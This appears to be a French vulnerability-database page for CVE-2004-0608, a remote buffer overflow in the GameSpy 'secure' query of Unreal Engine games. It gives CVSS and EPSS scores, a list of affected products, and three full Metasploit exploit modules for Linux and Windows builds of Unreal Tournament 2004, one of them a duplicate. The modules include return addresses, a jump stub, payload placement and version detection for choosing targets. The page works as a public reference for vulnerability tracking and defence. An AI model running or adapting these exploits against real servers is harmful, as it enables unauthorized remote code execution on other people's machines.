Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16848
Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The RunServer.sh script will automatically restart the
server upon a crash, giving us the ability to
bruteforce the service and exploit it multiple
times.
},
'Author' => [ 'onetwo' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-0608'],
[ 'OSVDB', '7217'],
[ 'BID', '10570'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x5c\x00",
},
'Platform' => 'linux',
'Targets' =>
[
['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
],
'DisclosureDate' => 'Jun 18 2004'))
register_options(
[
Opt::RPORT(7787)
], self.class)
end
def exploit
connect_udp
buf = make_nops(1024)
buf[24, 4] = [target['Rets'][1]].pack('V')
buf[44, 4] = [target['Rets'][0]].pack('V')
buf[56, 4] = [target['Rets'][1]].pack('V')
buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
buf[0, 8] = "\\secure\\"
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
udp_sock.put(buf)
handler
disconnect_udp
end
def ut_version
connect_udp
udp_sock.put("\\basic\\")
res = udp_sock.recvfrom(8192)
disconnect_udp
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
return m[1]
end
return
end
def check
vers = ut_version
if (not vers)
print_status("Could not detect Unreal Tournament Server")
return
end
print_status("Detected Unreal Tournament Server Version: #{vers}")
if (vers =~ /^(3120|3186|3204)$/)
print_status("This system appears to be exploitable")
return Exploit::CheckCode::Appears
end
if (vers =~ /^(2...)$/)
print_status("This system appears to be running UT2003")
return Exploit::CheckCode::Detected
end
print_status("This system appears to be patched")
return Exploit::CheckCode::Safe
end
end
Exploit Database EDB-ID : 10032
Date de publication : 2004-07-17 22h00 +00:00
Auteur : onetwo
EDB Vérifié : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The RunServer.sh script will automatically restart the
server upon a crash, giving us the ability to
bruteforce the service and exploit it multiple
times.
},
'Author' => [ 'onetwo' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0608'],
[ 'OSVDB', '7217'],
[ 'BID', '10570'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x5c\x00",
},
'Platform' => 'linux',
'Targets' =>
[
['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
],
'DisclosureDate' => 'Jun 18 2004'))
register_options(
[
Opt::RPORT(7787)
], self.class)
end
def exploit
connect_udp
buf = make_nops(1024)
buf[24, 4] = [target['Rets'][1]].pack('V')
buf[44, 4] = [target['Rets'][0]].pack('V')
buf[56, 4] = [target['Rets'][1]].pack('V')
buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
buf[0, 8] = "\\secure\\"
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
udp_sock.put(buf)
handler
disconnect_udp
end
def ut_version
connect_udp
udp_sock.put("\\basic\\")
res = udp_sock.recvfrom(8192)
disconnect_udp
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
return m[1]
end
return
end
def check
vers = ut_version
if (not vers)
print_status("Could not detect Unreal Tournament Server")
return
end
print_status("Detected Unreal Tournament Server Version: #{vers}")
if (vers =~ /^(3120|3186|3204)$/)
print_status("This system appears to be exploitable")
return Exploit::CheckCode::Appears
end
if (vers =~ /^(2...)$/)
print_status("This system appears to be running UT2003")
return Exploit::CheckCode::Detected
end
print_status("This system appears to be patched")
return Exploit::CheckCode::Safe
end
end
Exploit Database EDB-ID : 16693
Date de publication : 2010-09-19 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Win32)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The RunServer.sh script will automatically restart the
server upon a crash, giving us the ability to
bruteforce the service and exploit it multiple
times.
},
'Author' => [ 'stinko' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-0608'],
[ 'OSVDB', '7217'],
[ 'BID', '10570'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x5c\x00",
},
'Platform' => 'win',
'Targets' =>
[
['UT2004 Build 3186', { 'Rets' => [ 0x10184be3, 0x7ffdf0e4 ] }], # jmp esp
],
'DisclosureDate' => 'Jun 18 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(7787)
], self.class)
end
def exploit
connect_udp
buf = make_nops(1024)
buf[0, 60] = [target['Rets'][0]].pack('V') * 15
buf[54, 4] = [target['Rets'][1]].pack('V')
buf[0, 8] = "\\secure\\"
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
udp_sock.put(buf)
handler
disconnect_udp
end
def ut_version
connect_udp
udp_sock.put("\\basic\\")
res = udp_sock.recvfrom(8192)
disconnect_udp
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
return m[1]
end
return
end
def check
vers = ut_version
if (not vers)
print_status("Could not detect Unreal Tournament Server")
return
end
print_status("Detected Unreal Tournament Server Version: #{vers}")
if (vers =~ /^(3120|3186|3204)$/)
print_status("This system appears to be exploitable")
return Exploit::CheckCode::Appears
end
if (vers =~ /^(2...)$/)
print_status("This system appears to be running UT2003")
return Exploit::CheckCode::Detected
end
print_status("This system appears to be patched")
return Exploit::CheckCode::Safe
end
end
Products Mentioned
Configuraton 0
Arush>>Devastation >> Version 390.0
Dreamforge>>Tnn_outdoors_pro_hunter >> Version *
Epic_games>>Unreal_engine >> Version 226f
Epic_games>>Unreal_engine >> Version 433
Epic_games>>Unreal_engine >> Version 436
Epic_games>>Unreal_tournament >> Version 451b
Epic_games>>Unreal_tournament_2003 >> Version 2199_linux
Epic_games>>Unreal_tournament_2003 >> Version 2199_macos
Epic_games>>Unreal_tournament_2003 >> Version 2199_win32
Epic_games>>Unreal_tournament_2003 >> Version 2225_macos
Epic_games>>Unreal_tournament_2003 >> Version 2225_win32
Epic_games>>Unreal_tournament_2004 >> Version macos
Epic_games>>Unreal_tournament_2004 >> Version win32
Infogrames>>Tacticalops >> Version 3.4
Infogrames>>X-com_enforcer >> Version *
Ion_storm>>Deusex >> Version 1.112_fm
Nerf_arena_blast>>Nerf_arena_blast >> Version 1.2
Rage_software>>Mobile_forces >> Version 20000.0
Robert_jordan>>Wheel_of_time >> Version 333.0b
Running_with_scissors>>Postal_2 >> Version 1337
Configuraton 0
Gentoo>>Linux >> Version 1.4
Références